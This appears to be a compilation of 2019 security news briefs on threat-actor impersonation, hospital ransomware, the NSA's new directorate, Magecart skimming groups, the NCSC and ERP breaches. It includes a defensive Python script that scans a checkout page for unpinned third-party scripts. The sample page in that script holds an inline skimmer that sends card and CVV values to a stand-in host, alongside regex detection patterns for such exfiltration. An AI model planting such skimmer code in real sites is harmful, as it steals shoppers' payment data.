According to Optiv CISO Brian Wrozek, spotting when an impersonation is taking place is "quite difficult." He told Infosecurity Magazine: "Imagine robbing a bank, but the bank robber is able to present themselves as a police officer. It would be extremely difficult to identify that person. Security professionals look for patterns, which can create opportunities for bad actors to abuse those patterns to obscure their true identities."
Asked which class of threat actor is the easiest to impersonate, Wrozek said: "It’s difficult to say which is easiest, but one of the most common places we see this is in regard to nation-states. With so much politically driven activity regarding cybersecurity happening across the globe, it can be easy for nation-states to play the blame game with one another, making attribution difficult. Also, no one likes to admit they got hacked by some random individual. Saying a rich, powerful nation-state was behind an attack is much less embarrassing, so there’s that aspect to consider as well."
Other findings of the report are that crypto-jacking and ransomware attacks are increasing in popularity, and that retail, healthcare, government, and financial institutions continue to be among the most targeted verticals of cybersecurity attacks or attempts among the 10 categories of Optiv clients.
"Cyberspace has become more hostile. Hackers are more organized and sophisticated in 2019, and we’re seeing malicious attackers increase their counter measures to avoid detection,” said Tom Kellermann, chief cybersecurity officer at Carbon Black.
"According to our research, no vertical is immune, but the financial industry continues to stand out as a key target for advanced attacks. We hope cybersecurity leaders and teams will use this data as a clarion call to improve their cybersecurity postures."
Ten hospitals in Australia and the United States have been hit by ransomware attacks since Monday.
In America, computers at three Alabama hospitals operated by DCH Health System were affected, causing staff to close their doors to any new patients who weren't critically ill.
In a statement posted on their website earlier today, DCH wrote: "Early Oct 1, the DCH Health System discovered that it had suffered a ransomware attack that impacted their systems. We immediately implemented emergency procedures to continue providing safe and patient-centered care."
The hospitals affected by the attack are DCH Regional Medical Center in Tuscaloosa, Fayette Medical Center and Northport Medical Center. While access to computer systems remains limited, local ambulances are taking patients to other healthcare providers located nearby.
Surgeries scheduled for tomorrow will go ahead; however, outpatients with appointments at any of the three affected hospitals are advised to call to confirm before attending.
Services at seven hospitals and healthcare facilities in Australia have likewise been disrupted by ransomware in a separate cyber-attack which struck in Gippsland and south-west Victoria on Monday.
The impacted hospitals are part of the South West Alliance of Rural Health and the Gippsland Health Alliance. Multiple computer systems have been disconnected while the Victorian Cyber Incident Response Service works to resolve the situation.
Barwon Health, which operates hospitals affected by the attack, said that some elective surgeries and appointments had been cancelled.
The Victorian government's Department of Premier and Cabinet said: "A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.
"At this time, there is no suggestion that personal patient information has been accessed."
Commenting on the ransomware attacks, senior director of managed threat response at Sophos, J.J. Thompson, said: "Ransomware is foreseeable and preventable. Organizations need to have effective, advanced protection in place at every state of an attack. The techniques, tactics and procedures that occur prior to a ransomware incident can and should be detected by existing security capabilities and are foundational pillars to the patient care model in healthcare 4.0.
"It’s also important to have off-site backups to reduce the pressure to comply with expensive ransom demands and to be able to recover faster."
America's National Security Agency has launched a new organization to beef up the country's defenses against cyber-attackers.
The Cybersecurity Directorate has been created to unify the efforts of the NSA's existing foreign intelligence and cyber-defense missions. The new organization will bring the Agency's threat detection, future-technologies, and cyber-defense personnel together under one roof for the very first time.
Underpinning the creation of the directorate is the idea that forming partnerships to allow intelligence and technical expertise to be pooled and operationalized represents America's best chance of thwarting cyber-adversaries.
A spokesperson for the NSA said: "Many organizations work tirelessly to protect against today’s threats and tomorrow's risks, but the adversaries are tenacious, and they only need to be successful once.
"The Cybersecurity Directorate will reinvigorate NSA’s white hat mission by sharing critical threat information and collaborating with partners and customers to better equip them to defend against malicious cyber activity.
"The new directorate will also better position NSA to operationalize its threat intelligence, vulnerability assessments, and cyber-defense expertise by integrating these efforts to deliver prioritized outcomes."
One of the NSA's partners is the Department of Homeland Security, with whom the Agency has been working to identify and monitor the systems in the financial sector that make the easiest hacking targets.
By launching the new directorate, the NSA hopes to strengthen the cyber-shield protecting the country's national security systems and critical infrastructure from threat actors.
Topping the freshly launched organization's list of priorities are defending America's industrial base and innovating ways to improve the security of the nation's extensive arsenal of weapons.
Helping to safeguard the private sector is also something that the new directorate will focus on. Efforts will be made to declassify threat intelligence received by the new organization as speedily as possible so that it can be shared with US businesses.
NSA director General Paul Nakasone said: "What I’m trying to get to in a space like cyberspace is speed, agility, and unity of effort."
Leading the new Cybersecurity Directorate is director of cybersecurity Anne Neuberger, who reports directly to General Nakasone. Her previous positions include NSA’s first chief risk officer, deputy director of operations, and lead of NSA’s Russia Small Group.
Speaking at the Virus Bulletin 2019 conference in London, Yonathan Klijnsma, head of threat research at RiskIQ, said that many groups had been identified as being behind recent Magecart attacks, but that there was a shift towards more targeted attacks.
Pointing to Group 6, on which IBM’s X-Force published a report, Klijnsma said that “once they are in your network they will know more than you do, they are the admins you want to hire.” The group later hit both Newegg and British Airways, having access to the former for six months, but crucially was no longer present during Black Friday, as it had been detected and removed by then.
Another, Group 5, are “experts in support,” and Klijnsma said they know of at least 20 suppliers that have been hit by this group. “They hit one supplier who had over 100,000 victim websites,” and while a compromised supplier delivers the malicious code, the supplier itself has no access to payment data.
A group that RiskIQ plans to reveal more details on in the coming months is Group 15, who Klijnsma said are “very specialized,” as they have built a framework for skimming and are able to remove a payment form and put their own in its place.
This, he said, was part of the evolution of the groups, as they are doing more targeting and learning more about content management systems. In the case of the attack on Ticketmaster, this was enabled by a compromise of Sociaplus between December 2017 and June 2018.
That attack illustrates one of the three main ways these groups gain access: through outdated or misconfigured systems, through password reuse (the groups mine breached credential lists) and through the supply chain.
“The latter is not something people are talking about and while you want analytics and CDNs and services, they make you vulnerable and make your customers and visitors vulnerable to attack.”
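The supply-chain point is concrete: every third-party script a checkout page loads runs with the same access to the payment form as the site’s own code. The following is an added example, not RiskIQ’s code or data: it audits a constructed checkout page for third-party scripts loaded without Subresource Integrity and for inline code that reads card fields and contacts a host other than the first party, the pattern a form-replacing or form-hooking skimmer leaves behind. The page, host names, paths and the integrity value (a placeholder, not a real hash) are all constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page (hypothetical hosts and paths, not from any real
# site or from RiskIQ's research). It contains a first-party script, a
# third-party script pinned with Subresource Integrity, a third-party script
# loaded with no integrity check, and an inline skimmer that reads the card
# fields and beacons them to a foreign origin.
PAGE = """
<html><body>
<form id="payment">
  <input name="cardnumber"><input name="cvv"><input name="expiry">
</form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-analytics.com/lib.js"
        integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://cdn.example-chat.com/widget.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=cardnumber]').value,
           c: document.querySelector('[name=cvv]').value};
  new Image().src = 'https://stats-collector.example.net/i.gif?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

PAYMENT_FIELD = re.compile(r"card|cvv|cvc|ccnum|expir", re.I)
EXFIL_CALL = re.compile(r"new Image\(\)|fetch\(|XMLHttpRequest|sendBeacon\(|\.send\(")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
NO_SRI = "third-party script without SRI"
SKIMMER = "inline script reads payment fields and sends to a foreign origin"


class ScriptCollector(HTMLParser):
    """Collect external script tags (src, has integrity attribute) and the
    bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_data(self, data):
        # Script bodies arrive as CDATA, possibly in several chunks.
        if self._in_inline:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def audit_scripts(page_html, first_party_host):
    """Return (issue, detail) pairs: third-party scripts loaded without
    integrity pinning, and inline code that touches payment fields and
    contacts a host other than the first party."""
    parser = ScriptCollector()
    parser.feed(page_html)
    findings = []
    for src, has_sri in parser.external:
        host = urlparse(src).hostname
        if host and host != first_party_host and not has_sri:
            findings.append((NO_SRI, src))
    for code in parser.inline:
        foreign = sorted({h for h in URL_HOST.findall(code) if h != first_party_host})
        if foreign and PAYMENT_FIELD.search(code) and EXFIL_CALL.search(code):
            findings.append((SKIMMER, ",".join(foreign)))
    return findings


if __name__ == "__main__":
    for issue, detail in audit_scripts(PAGE, "shop.example.com"):
        print(issue + ":", detail)
```

SRI pins a specific version of a file, so it does nothing if the supplier is already compromised when you compute the hash, and it cannot cover scripts that a third party injects dynamically at runtime. The inline heuristic is a static hint only; a skimmer can obfuscate both field names and destinations. Pair both checks with a Content Security Policy whose connect-src, img-src and form-action directives allow only the origins the payment flow genuinely needs, which blocks the exfiltration step regardless of how the code arrived.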
As it prepares to mark its third anniversary of opening, the National Cyber Security Centre (NCSC) has said that defending the UK is a team effort and encouraged more businesses to work with it.
Speaking at the Virus Bulletin 2019 conference in London, director of operations at the NCSC Paul Chichester, reflected on the work done to create the NCSC, and how UK businesses needed to work alongside it.
Chichester explained that the momentum for a response center began in the 2000s, when the attackers targeting the UK were looked at more closely. Today “there are 20 nation state threats that we track,” and while the NCSC does not track all threats or compete with commercial companies, it can “understand additional insights.”
He said that with 20 years of capability and insight into threats to the UK, government funding in 2010 led to the development of the NCSC, which addressed the “obvious flaws in the approach that the UK took,” in particular that there was no single point or place to go to report issues.
Admitting that the work of the NCSC will not stop the UK being an interest for attackers, Chichester pointed out that it is able to counter threats. “Our work in the past has been on observing threats, and our view is that it is not about counting but countering the threat,” he added.
He also said that because the NCSC is responsible for attribution, the UK government understands the context of threats and can assess each threat as it pertains to the UK. “Also, we don’t respond with a red button, but by helping people, reporting to the victim and doing victim notification,” he continued, adding that the NCSC does “a huge amount of work in the UK and works with organizations to help them recover. Attribution is an art, not a science.”
He concluded his talk by saying that the NCSC wants to collaborate more, and work with people in the industry “and for us it is a team sport and please talk to us - we care about the things you care about.”
Later speaking to Infosecurity, Chichester said that the efforts undertaken by the NCSC include doing formal attribution, and protecting the anonymity of the organizations it protects. As part of this, it feeds tactical intelligence via its CISP and partner channels, and he said that companies are often not judged by the compromise, “but how they deal with it.”
Asked if businesses are coming to the NCSC to collaborate, Chichester said they are “massively” and this is fundamental for the business. “We want people to come to us to get insight into threats at a macro level, and we want to work with organizations to help us understand what they are seeing and doing [regarding] incident response.”
Nearly two-thirds of businesses which rely on SAP or Oracle have suffered a breach of their ERP systems in the past two years, according to new research from Onapsis.
The security vendor commissioned IDC to poll 430 IT decision makers knowledgeable about their organization's ERP applications.
Of the 64% that have suffered a breach of SAP or Oracle E-Business Suite (EBS), sales data (50%) was most commonly compromised, followed by HR data (45%), personal customer information (41%), intellectual property (36%) and financial data (34%).
The range of sensitive information listed above highlights the crucial role security teams have in protecting ERP applications, especially considering that, on average, three-quarters (74%) of these ERP applications were internet connected.
“ERP applications can be foundational for businesses. A breach of such critical ERP applications can lead to unexpected downtime, increased compliance risk, diminished brand confidence and project delays,” said Frank Dickson, program vice-president, cybersecurity products with IDC.
“Cyber-miscreants seem to be indiscriminate when it comes to ERP systems, having an appetite for all types of data, which, if in the wrong hands, could be detrimental to the business in terms of revenue and reputation.”
The high volume of breaches is also somewhat at odds with another finding: that 78% of respondents audit their ERP applications at least once every 90 days.
Larry Harrington, former chairman of the Global Board of the Institute of Internal Auditors (IIA), said the findings should raise questions at a board level about the quality of such audits.
“The lack of these controls is one way for cyber insurance companies to deny claims,” he warned. “The information compromised most often according to this research is the highest regulated in today’s business ecosystem. Most concerning is the popularity of sales, financial data and PII, all of which should raise flags about the possibility of insider trading, collusion and fraud.”